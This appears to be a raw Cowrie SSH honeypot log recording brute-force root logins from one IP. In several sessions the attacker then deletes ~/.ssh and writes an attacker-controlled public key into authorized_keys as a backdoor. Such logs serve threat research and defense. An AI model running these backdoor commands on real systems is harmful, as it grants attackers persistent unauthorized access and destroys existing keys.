{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:55.210516Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.login.success","username":"root","password":"1321","message":"login attempt [root/1321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:44:56.130100Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:44:56.607668Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:44:56.608327Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:44:56.609155Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:56.840275Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:44:57.358859Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:44:57.359657Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:44:57.590954Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:57.591800Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50522,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bee47fd5cc3","protocol":"ssh","message":"New connection: 212.227.235.229:50522 (1.2.3.4:22) [session: 5bee47fd5cc3]","sensor":"my-vps","timestamp":"2025-08-28T15:44:57.833793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:57.834719Z","src_ip":"212.227.235.229","session":"5bee47fd5cc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:58.071347Z","src_ip":"212.227.235.229","session":"5bee47fd5cc3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:44:59.061063Z","src_ip":"212.227.235.229","session":"5bee47fd5cc3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:00.302323Z","src_ip":"212.227.235.229","session":"5bee47fd5cc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51640,"dst_ip":"1.2.3.4","dst_port":22,"session":"d29d45d1e32f","protocol":"ssh","message":"New connection: 212.227.235.229:51640 (1.2.3.4:22) [session: d29d45d1e32f]","sensor":"my-vps","timestamp":"2025-08-28T15:45:00.534568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:00.535288Z","src_ip":"212.227.235.229","session":"d29d45d1e32f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:00.764754Z","src_ip":"212.227.235.229","session":"d29d45d1e32f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:45:01.724073Z","src_ip":"212.227.235.229","session":"d29d45d1e32f"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:01.944612Z","src_ip":"212.227.235.229","session":"ac087755f653"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:01.956001Z","src_ip":"212.227.235.229","session":"d29d45d1e32f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33186,"dst_ip":"1.2.3.4","dst_port":22,"session":"d22aa0d055ca","protocol":"ssh","message":"New connection: 212.227.235.229:33186 (1.2.3.4:22) [session: d22aa0d055ca]","sensor":"my-vps","timestamp":"2025-08-28T15:45:15.709774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:45:15.710713Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T15:45:15.798410Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"8d:4b:63:6c:22:ce:c8:04:6d:ba:52:b7:cb:dd:55:1f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnKb2IKseA8OythUyb9mautn4i7TlQGjs93aansUyGhg6gBlIc94FH8uQQkaBsQkhCIMXTr963fHtbKdzvaQdIeXBvMLQxyVZe0td5Vh3QS5I6mPsPj3ox+N5ATYGTMQJ1LmGQAVe+mwGv1GFEwTE5EH5uXwvQVKLB5VRTp2WwO0HDUL96AevkB+YnrsRhA3GiYDDhmih1laXEjcab+vhCyEGMsc/1YK57s/S6zP0B3426EOBA0ABi0JNfiB0e0BzGe8Waigd0RZQqdP/vgT8H6tBUtffAjkGJ1Vujh8qGknmhCIP/vitTbzoaRJHqMEb2+dQnaDvydqpUxpqiVXAP","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 8d:4b:63:6c:22:ce:c8:04:6d:ba:52:b7:cb:dd:55:1f","sensor":"my-vps","timestamp":"2025-08-28T15:45:15.976236Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"8d:4b:63:6c:22:ce:c8:04:6d:ba:52:b7:cb:dd:55:1f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnKb2IKseA8OythUyb9mautn4i7TlQGjs93aansUyGhg6gBlIc94FH8uQQkaBsQkhCIMXTr963fHtbKdzvaQdIeXBvMLQxyVZe0td5Vh3QS5I6mPsPj3ox+N5ATYGTMQJ1LmGQAVe+mwGv1GFEwTE5EH5uXwvQVKLB5VRTp2WwO0HDUL96AevkB+YnrsRhA3GiYDDhmih1laXEjcab+vhCyEGMsc/1YK57s/S6zP0B3426EOBA0ABi0JNfiB0e0BzGe8Waigd0RZQqdP/vgT8H6tBUtffAjkGJ1Vujh8qGknmhCIP/vitTbzoaRJHqMEb2+dQnaDvydqpUxpqiVXAP","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:15.976867Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"8d:4b:63:6c:22:ce:c8:04:6d:ba:52:b7:cb:dd:55:1f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnKb2IKseA8OythUyb9mautn4i7TlQGjs93aansUyGhg6gBlIc94FH8uQQkaBsQkhCIMXTr963fHtbKdzvaQdIeXBvMLQxyVZe0td5Vh3QS5I6mPsPj3ox+N5ATYGTMQJ1LmGQAVe+mwGv1GFEwTE5EH5uXwvQVKLB5VRTp2WwO0HDUL96AevkB+YnrsRhA3GiYDDhmih1laXEjcab+vhCyEGMsc/1YK57s/S6zP0B3426EOBA0ABi0JNfiB0e0BzGe8Waigd0RZQqdP/vgT8H6tBUtffAjkGJ1Vujh8qGknmhCIP/vitTbzoaRJHqMEb2+dQnaDvydqpUxpqiVXAP","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 8d:4b:63:6c:22:ce:c8:04:6d:ba:52:b7:cb:dd:55:1f","sensor":"my-vps","timestamp":"2025-08-28T15:45:16.065612Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"8d:4b:63:6c:22:ce:c8:04:6d:ba:52:b7:cb:dd:55:1f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnKb2IKseA8OythUyb9mautn4i7TlQGjs93aansUyGhg6gBlIc94FH8uQQkaBsQkhCIMXTr963fHtbKdzvaQdIeXBvMLQxyVZe0td5Vh3QS5I6mPsPj3ox+N5ATYGTMQJ1LmGQAVe+mwGv1GFEwTE5EH5uXwvQVKLB5VRTp2WwO0HDUL96AevkB+YnrsRhA3GiYDDhmih1laXEjcab+vhCyEGMsc/1YK57s/S6zP0B3426EOBA0ABi0JNfiB0e0BzGe8Waigd0RZQqdP/vgT8H6tBUtffAjkGJ1Vujh8qGknmhCIP/vitTbzoaRJHqMEb2+dQnaDvydqpUxpqiVXAP","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:16.066320Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:25.709866Z","src_ip":"212.227.235.229","session":"d22aa0d055ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55008,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf57f367762e","protocol":"ssh","message":"New connection: 212.227.235.229:55008 (1.2.3.4:22) [session: cf57f367762e]","sensor":"my-vps","timestamp":"2025-08-28T15:45:29.336877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:29.337573Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:29.552047Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.login.success","username":"root","password":"qf123456@","message":"login attempt [root/qf123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:45:30.452347Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:45:30.899007Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:45:30.899716Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:45:30.901186Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:31.117635Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:45:32.010429Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.011152Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51328,"dst_ip":"1.2.3.4","dst_port":22,"session":"24e0353c4cd9","protocol":"ssh","message":"New connection: 212.227.235.229:51328 (1.2.3.4:22) [session: 24e0353c4cd9]","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.013635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.014310Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.227447Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.228529Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"